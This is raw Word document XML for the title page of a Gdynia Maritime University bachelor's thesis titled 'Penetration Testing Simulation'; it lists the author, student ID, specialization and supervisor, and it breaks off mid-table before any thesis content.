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5386"/>
      </w:tblGrid>
      <w:tr w:rsidR="003C7B6F" w:rsidRPr="00D77DFE" w14:paraId="0A8B3C35" w14:textId="77777777" w:rsidTr="007B6EB7">
        <w:trPr>
          <w:trHeight w:val="1141"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4820" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="650D5F8E" w14:textId="5B4664FC" w:rsidR="003C7B6F" w:rsidRPr="00D77DFE" w:rsidRDefault="0012645B" w:rsidP="007B6EB7">
            <w:pPr>
              <w:ind w:right="1030"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Gdynia Maritime University</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D17AEC4" w14:textId="70C91880" w:rsidR="003C7B6F" w:rsidRPr="00D77DFE" w:rsidRDefault="0012645B" w:rsidP="0012645B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Faculty of Electrical Engineering</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1211345F" w14:textId="0E9803D8" w:rsidR="003C7B6F" w:rsidRPr="00D77DFE" w:rsidRDefault="0012645B" w:rsidP="0012645B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:noProof/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:noProof/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Department of </w:t>
            </w:r>
            <w:r w:rsidR="00F67ED0" w:rsidRPr="00F67ED0">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:noProof/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Marine Telecommunications</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5386" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3912D5B6" w14:textId="1EC1E6F1" w:rsidR="003C7B6F" w:rsidRPr="00D77DFE" w:rsidRDefault="0012645B" w:rsidP="007B6EB7">
            <w:pPr>
              <w:ind w:left="325"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Registration </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>number:</w:t>
            </w:r>
            <w:r w:rsidR="003C7B6F" w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>.............................................</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="229D7F9C" w14:textId="3594367E" w:rsidR="003C7B6F" w:rsidRPr="00D77DFE" w:rsidRDefault="0012645B" w:rsidP="007B6EB7">
            <w:pPr>
              <w:ind w:left="325"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Date of </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>submission:</w:t>
            </w:r>
            <w:r w:rsidR="003C7B6F" w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidR="003C7B6F" w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>......................................</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0F354B02" w14:textId="77777777" w:rsidR="003C7B6F" w:rsidRPr="00D77DFE" w:rsidRDefault="003C7B6F" w:rsidP="007B6EB7">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C7B6F" w:rsidRPr="00D77DFE" w14:paraId="5B9E0513" w14:textId="77777777" w:rsidTr="007B6EB7">
        <w:trPr>
          <w:trHeight w:val="1141"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10206" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="1A9184BD" w14:textId="77777777" w:rsidR="003C7B6F" w:rsidRPr="00D77DFE" w:rsidRDefault="003C7B6F" w:rsidP="007B6EB7">
            <w:pPr>
              <w:ind w:left="325"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:noProof/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <mc:AlternateContent>
                <mc:Choice Requires="wpg">
                  <w:drawing>
                    <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251776000" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="58358F81" wp14:editId="19CF2D65">
                      <wp:simplePos x="0" y="0"/>
                      <wp:positionH relativeFrom="column">
                        <wp:posOffset>2156460</wp:posOffset>
                      </wp:positionH>
                      <wp:positionV relativeFrom="paragraph">
                        <wp:posOffset>66040</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="1310400" cy="1350000"/>
                      <wp:effectExtent l="0" t="0" r="0" b="0"/>
                      <wp:wrapTopAndBottom/>
                      <wp:docPr id="25100" name="Grupa 25100"/>
                      <wp:cNvGraphicFramePr/>
                      <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                        <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                          <wpg:wgp>
                            <wpg:cNvGrpSpPr/>
                            <wpg:grpSpPr>
                              <a:xfrm>
                                <a:off x="0" y="0"/>
                                <a:ext cx="1310400" cy="1350000"/>
                                <a:chOff x="0" y="0"/>
                                <a:chExt cx="1136780" cy="1719593"/>
                              </a:xfrm>
                            </wpg:grpSpPr>
                            <wps:wsp>
                              <wps:cNvPr id="5" name="Rectangle 2168"/>
                              <wps:cNvSpPr/>
                              <wps:spPr>
                                <a:xfrm>
                                  <a:off x="797815" y="78514"/>
                                  <a:ext cx="50673" cy="273026"/>
                                </a:xfrm>
                                <a:prstGeom prst="rect">
                                  <a:avLst/>
                                </a:prstGeom>
                                <a:ln>
                                  <a:noFill/>
                                </a:ln>
                              </wps:spPr>
                              <wps:txbx>
                                <w:txbxContent>
                                  <w:p w14:paraId="6B1378C7" w14:textId="77777777" w:rsidR="003C7B6F" w:rsidRDefault="003C7B6F" w:rsidP="003C7B6F">
                                    <w:pPr>
                                      <w:spacing w:line="256" w:lineRule="auto"/>
                                    </w:pPr>
                                  </w:p>
                                </w:txbxContent>
                              </wps:txbx>
                              <wps:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                                <a:noAutofit/>
                              </wps:bodyPr>
                            </wps:wsp>
                            <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                              <pic:nvPicPr>
                                <pic:cNvPr id="6" name="Picture 2285"/>
                                <pic:cNvPicPr/>
                              </pic:nvPicPr>
                              <pic:blipFill>
                                <a:blip r:embed="rId8">
                                  <a:extLst>
                                    <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                                      <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                                    </a:ext>
                                  </a:extLst>
                                </a:blip>
                                <a:srcRect/>
                                <a:stretch/>
                              </pic:blipFill>
                              <pic:spPr>
                                <a:xfrm>
                                  <a:off x="0" y="0"/>
                                  <a:ext cx="1136780" cy="171959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8358F81" id="Grupa 25100" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:169.8pt;margin-top:5.2pt;width:103.2pt;height:106.3pt;z-index:251776000;mso-width-relative:margin;mso-height-relative:margin" coordsize="11367,17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">
                      <v:rect id="Rectangle 2168" o:spid="_x0000_s1027" style="position:absolute;left:7978;top:785;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6B1378C7" w14:textId="77777777" w:rsidR="003C7B6F" w:rsidRDefault="003C7B6F" w:rsidP="003C7B6F">
                              <w:pPr>
                                <w:spacing w:line="256"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85" o:spid="_x0000_s1028" type="#_x0000_t75" style="position:absolute;width:11367;height:1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">
                        <v:imagedata r:id="rId9" o:title=""/>
                      </v:shape>
                      <w10:wrap type="topAndBottom"/>
                    </v:group>
                  </w:pict>
                </mc:Fallback>
              </mc:AlternateContent>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="21E3FB6D" w14:textId="77777777" w:rsidR="003C7B6F" w:rsidRPr="00D77DFE" w:rsidRDefault="003C7B6F" w:rsidP="003C7B6F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42314ABB" w14:textId="07E1F4B8" w:rsidR="003C7B6F" w:rsidRPr="00D77DFE" w:rsidRDefault="0012645B" w:rsidP="0012645B">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="600" w:after="360" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc223521071"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Bachelor’s Thesis</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidR="003C7B6F" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65D52E9C" w14:textId="6C43558E" w:rsidR="003C7B6F" w:rsidRPr="00D77DFE" w:rsidRDefault="003C7B6F" w:rsidP="001A0ACA">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="2114"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="001A0ACA" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>itle: Penetration Testing Simulation</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E69F5D5" w14:textId="77777777" w:rsidR="003C7B6F" w:rsidRPr="00D77DFE" w:rsidRDefault="003C7B6F" w:rsidP="003C7B6F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0208BA15" w14:textId="77777777" w:rsidR="003C7B6F" w:rsidRPr="00D77DFE" w:rsidRDefault="003C7B6F" w:rsidP="003C7B6F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid0"/>
        <w:tblW w:w="9317" w:type="dxa"/>
        <w:tblInd w:w="-108" w:type="dxa"/>
        <w:tblCellMar>
          <w:left w:w="108" w:type="dxa"/>
          <w:right w:w="115" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1521"/>
        <w:gridCol w:w="5528"/>
        <w:gridCol w:w="2268"/>
      </w:tblGrid>
      <w:tr w:rsidR="003C7B6F" w:rsidRPr="00D77DFE" w14:paraId="45E8D8F0" w14:textId="77777777" w:rsidTr="007B6EB7">
        <w:trPr>
          <w:trHeight w:val="454"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1521" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="23D778F8" w14:textId="533CDBA7" w:rsidR="003C7B6F" w:rsidRPr="00D77DFE" w:rsidRDefault="0012645B" w:rsidP="007B6EB7">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Author</w:t>
            </w:r>
            <w:r w:rsidR="003C7B6F" w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5528" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1C48848F" w14:textId="157DDAD5" w:rsidR="003C7B6F" w:rsidRPr="00D77DFE" w:rsidRDefault="003C7B6F" w:rsidP="007B6EB7">
            <w:pPr>
              <w:jc w:val="cente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Muhammad Zain Din</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="251230DA" w14:textId="11B24510" w:rsidR="003C7B6F" w:rsidRPr="00D77DFE" w:rsidRDefault="0012645B" w:rsidP="0012645B">
            <w:pP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Student ID number</w:t>
            </w:r>
            <w:r w:rsidR="003C7B6F" w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>: 49597</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C7B6F" w:rsidRPr="00D77DFE" w14:paraId="40CA90BD" w14:textId="77777777" w:rsidTr="007B6EB7">
        <w:trPr>
          <w:trHeight w:val="454"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1521" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="10D73C71" w14:textId="1D6968F1" w:rsidR="003C7B6F" w:rsidRPr="00D77DFE" w:rsidRDefault="0012645B" w:rsidP="007B6EB7">
            <w:pP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Specialization</w:t>
            </w:r>
            <w:r w:rsidR="003C7B6F" w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">: </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7796" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2C3678F1" w14:textId="708063E9" w:rsidR="003C7B6F" w:rsidRPr="00D77DFE" w:rsidRDefault="003C7B6F" w:rsidP="007B6EB7">
            <w:pPr>
              <w:jc w:val="cente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Aplikacje Internetowe i Mobilne</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C7B6F" w:rsidRPr="00D77DFE" w14:paraId="7B33C020" w14:textId="77777777" w:rsidTr="007B6EB7">
        <w:trPr>
          <w:trHeight w:val="454"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1521" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="361F7EAC" w14:textId="0A906344" w:rsidR="003C7B6F" w:rsidRPr="00D77DFE" w:rsidRDefault="0012645B" w:rsidP="007B6EB7">
            <w:pP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Supervisor</w:t>
            </w:r>
            <w:r w:rsidR="003C7B6F" w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5528" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="714B686B" w14:textId="5E67C74F" w:rsidR="003C7B6F" w:rsidRPr="00D77DFE" w:rsidRDefault="003C7B6F" w:rsidP="007B6EB7">
            <w:pPr>
              <w:jc w:val="cente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dr hab. inż. Agnieszka Rybarczyk, prof. UMG</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="74F1CC33" w14:textId="2F932D3A" w:rsidR="003C7B6F" w:rsidRPr="00D77DFE" w:rsidRDefault="003C7B6F" w:rsidP="007B6EB7">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C7B6F" w:rsidRPr="00D77DFE" w14:paraId="418BE382" w14:textId="77777777" w:rsidTr="007B6EB7">
        <w:trPr>
          <w:trHeight w:val="454"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1521" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0B5E98B8" w14:textId="1FC9E402" w:rsidR="003C7B6F" w:rsidRPr="00D77DFE" w:rsidRDefault="0012645B" w:rsidP="007B6EB7">
            <w:pP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Reviewer:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5528" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="47157F85" w14:textId="0F9F65E2" w:rsidR="003C7B6F" w:rsidRPr="00D77DFE" w:rsidRDefault="003C7B6F" w:rsidP="007B6EB7">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1EC9DF65" w14:textId="3C3ACDE2" w:rsidR="003C7B6F" w:rsidRPr="00D77DFE" w:rsidRDefault="003C7B6F" w:rsidP="007B6EB7">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C7B6F" w:rsidRPr="00D77DFE" w14:paraId="3D7500BA" w14:textId="77777777" w:rsidTr="007B6EB7">
        <w:trPr>
          <w:trHeight w:val="454"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1521" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2EA3C673" w14:textId="1B48B8AF" w:rsidR="003C7B6F" w:rsidRPr="00D77DFE" w:rsidRDefault="0012645B" w:rsidP="007B6EB7">
            <w:pP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Date of defense</w:t>
            </w:r>
            <w:r w:rsidR="003C7B6F" w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
